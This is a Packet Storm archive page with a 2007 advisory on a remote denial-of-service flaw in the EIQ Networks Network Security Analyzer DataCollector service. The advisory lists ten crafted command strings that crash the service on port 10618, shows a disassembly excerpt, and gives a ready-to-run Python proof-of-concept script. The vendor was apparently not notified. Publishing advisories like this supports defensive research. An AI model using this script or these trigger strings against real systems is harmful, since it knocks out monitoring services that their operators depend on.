what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

eiq-dos.txt

eiq-dos.txt
Posted Jan 13, 2007
Authored by Ethan Hunt

Remote exploitation of a null pointer dereference exception allows for remote attackers to crash the EIQ Network Security Analyzer DataCollector service. Proof of concept code included.

tags | exploit, remote, denial of service, proof of concept
SHA-256 | c0b59ba8423b52c53bb5d71af4b0a0a7949088f8c0b4de25895ca990ce8a071d

eiq-dos.txt

Change Mirror Download
Title:
-------------------
EIQ Networks Network Security Analyzer DoS Vulnerability


Vendor Notified:
-------------------
Now?


Background Info:
-------------------
EIQ Networks Product Site: http://www.eiqnetworks.com/products/NetworkSecurityAnalyzer.shtml


Description:
-------------------
Remote exploitation of a null pointer dereference exception allows for remote attackers to crash the DataCollector service.


Analysis:
-------------------
In order to exploit this vulnerability an attacker would have to simply send specially crafted data to the target machine on port 10618.


Any of the following "function names" will cause the service to throw an access violation while dereferencing the return value from a call to FindIndex ( http://msdn2.microsoft.com/de-de/library/a93550bb(VS.80).aspx):

&CONNECTSERVER&
&ADDENTRY&
&FIN&
&START&
&LOGPATH&
&FWADELTA&
&FWALOG&
&SETSYNCHRONOUS&
&SETPRGFILE&
&SETREPLYPORT&


For your reference..... the process begins its parsing here:

loc_40A35E:
; CODE XREF: command_handler+EAj
.text:0040A35E push offset aConnectserver ; must have &CONNECTSERVER& in your buffer to get here
.text:0040A363 lea ecx, [ebp+var_14]
.text:0040A366 call CString::Find(char const *)
...


Version:
-------------------
Current.


Proof of Concept:
-------------------
#!c:\python\python.exe
# uncomment whichever function youd like. theyll all crash in a similar way.

import socket

s = socket.socket(socket.AF_INET , socket.SOCK_STREAM)
s.connect(('192.168.1.101', 10618))

print "[*] connected"

s.send("&CONNECTSERVER&")
#s.send("&ADDENTRY&")
#s.send("&FIN&")
#s.send("&START&")
#s.send("&LOGPATH&")
#s.send("&FWADELTA&")
#s.send("&FWALOG&")
#s.send("&SETSYNCHRONOUS&")
#s.send("&SETPRGFILE&")
#s.send("&SETREPLYPORT&")

print "disconnecting."

s.close()

--
Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    63 Files
  • 14
    Nov 14th
    18 Files
  • 15
    Nov 15th
    8 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    18 Files
  • 19
    Nov 19th
    7 Files
  • 20
    Nov 20th
    13 Files
  • 21
    Nov 21st
    6 Files
  • 22
    Nov 22nd
    48 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    60 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close